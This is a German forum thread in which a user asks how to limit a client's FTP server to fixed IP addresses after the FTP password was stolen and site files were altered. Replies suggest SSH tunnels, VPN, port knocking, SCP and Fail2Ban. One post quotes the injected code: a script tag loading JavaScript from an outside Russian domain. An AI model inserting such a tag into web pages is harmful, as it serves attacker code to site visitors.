Feste IP für FTP Server

[MisterSimpson]

Hallo,

ich beziehe DSL über Alice und somit erhalte ich alle 24 Stunden eine neue IP sprich ich habe eine dynamische IP Adresse. In den meisten Fällen ist das ja so.

Nun gut zu meinem Problem. Vor kurzem gab es einen Angriff auf den FTP Server meines Kunden und die Idee ist jetzt den FTP Zugang nur für eine bestimmte IP freizugeben. Mein Kunde hat immer dieselbe IP Adresse, aber bei mir ist das ein Problem. Jetzt habe ich schon an dyndns gedacht, aber kann man im Server eine dyndns hinterlegen, dass diese auf den FTP zugreifen darf, aber wiederrum wie soll ich das in meinem FileZilla einstellen?

Wie könnte ich dieses Problem lösen? Was mir gerade einfällt evtl. ein Proxy, aber gibt es da was kostenloses und ist das ein Programm was ich anmache und dann habe ich die Proxy Adresse?

 

[ice-breaker]

SSH-Tunnel? OpenVPN?

Dem FTP-Server eine DynDNS-URL beizubringen wird wahrscheinlich schwer wie bis nicht möglich sein.

 

[papslf58]

Feste IP

Hallo

Ich wüßte nicht was an deinem Vorhaben besser wäre?

Ich halte eine feste IP für eine höhrees Risiko, als eine sich dauernd ändernde IP.

Die IP ist doch nicht das Sicherheitsproblem, oder doch ?

Wie erfolgte denn der Angriff? via ssh

 

[No5251]

Definiere "Angriff"? Welcher FTP-Server und ist etwas passiert?

Und du könntest das ganze auch über Port Knocking lösen.

 

[DelphiKing]

Wie erfolgte denn der Angriff? via ssh

Angriff auf den FTP-Dienst via SSH? Dann wäre es doch eher ein Angriff auf den SSH-Dienst?

Und @No5251: Wieso ist es unsicherer, wenn man von vorne herein alle Verbindungen, die nicht von 2 bestimmten IPs kommen, rausfiltert? Natürlich sollten sich die anderen beiden IPs dann trotzdem noch authentifizieren müssen… aber es hält zumindest schonmal fast alle Angreifer davon ab, es überhaupt erst zu probieren.

Aber mit DynDNS wird das wohl wirklich übertrieben kompliziert und nur mittelmäßig sicher… wie schon erwähnt wurde: Es gibt bessere und sicherere Möglichkeiten.

 

[MisterSimpson]

Ja man kam also an das FTP Passwort dran und somit wurde durch ein Script / Bot mehrere Dateien modifiziert und wieder hochgeladen. Waren zwei Zeilen mit einer russischen Domain und JavaScript.

Die Idee ist das nur die und die IP Adresse auf den FTP Server sich einloggen kann und keine andere IP Adresse mehr.

 

[Bububoomt]

kommt mir bekannt vor, lass mich raten, das waren html,js oder php dateien die geändert wurden?

Hast du nicht vielelicht nen Zugriff auf nen anderen Server mit fester IP? So das du über den gehen kannst?

 

[MisterSimpson]

Richtig Bububoomt

Habe keinen anderen Server wenn Webspace, aber das nützt mir ja nichts.

 

[LasMiranda]

Der "Einbruch" klingt zwar eher nach XSS und/oder CHMOD 777, aber na gut.

 

[ice-breaker]

XSS und CHMOD 777

das soll nen oder sein? Weil mir wäre kein kombinierter XSS und CHMOD 777 Angriff bekannt, beide sind ja für sich alleine schon ausreichend.

 

[MisterSimpson]

Hoffe ich darf das posten. Also in den Dateien war dieser code reingeschrieben worden:

<script type="text/javascript" src="https://pantscow.ru:8080/Keywords.js"></script>
<!--39e7d09ab7556ab9e8f6050b12321360-->

 

[LasMiranda]

...Also in den Dateien war dieser code reingeschrieben worden:...

Aber was sagt das aus, wie der Angriff erfolgte? Nichts.

 

[tyygoor]

Hallo,

also einen ftp User eine fest Ip zuzuordner halte ich für bedenklich, da er ja so an eine/seine Leitung gebunden ist. Viel wichtiger ist da herauszubekommen:

Wie kam der Bösewicht ins ftp? = leichtes PW? kein Schutz vor Brute-Force-Suche (engl. „brute force search“) etc etc? Sicher das nur ftp betroffen ist? War es ein unsicheres Script vom "Kunden" ?

dazu kommt,

Logdateien prüfen etc etc ....

gruss zur Nacht

 

[IceTigers]

Naja auch wenn du keine feste IP hast sind normalerweise die ersten 4 Zahlen immer gleich also z.B. 92.43.**.***
Sollte als Schutz eigentlich auch schon ausreichen nur die IP des Kunden und alle IPs mit z.B. 92.43.**.*** zuzulassen

 

[MisterSimpson]

Welche Möglichkeiten gibt es um sich sicher in einen FTP einzuloggen. Also bei meinem Provider könnte ich eine feste IP beantragen, aber eine feste IP hat ja nicht nur Vorteile. Welche Möglichkeit gibt es also sonst noch eine sichere FTP Verbindung aufzubauen bzw. den Kreis die sich einloggen können zu verengen?

 

[No5251]

Und @No5251: Wieso ist es unsicherer, wenn man von vorne herein alle Verbindungen, die nicht von 2 bestimmten IPs kommen, rausfiltert?

Nicht unsicher, nur ungeschickt - manchmal.
Ich persönlich kann mit Adressbeschränkungen nur leben, wenn ich an einer anderen Stelle noch eine Möglichkeit habe mich von überall anzumelden. Wegen jeder Kleinigkeit ins Büro rennen zu müssen, um eine Änderung durchzuführen, wäre mir auf Dauer zu blöd.

Welche Möglichkeiten gibt es um sich sicher in einen FTP einzuloggen.

• kein FTP, nur SCP (inkl. Key Authentication)
• Fail2Ban
• IP-Begrenzung
• Port Knocking
• ...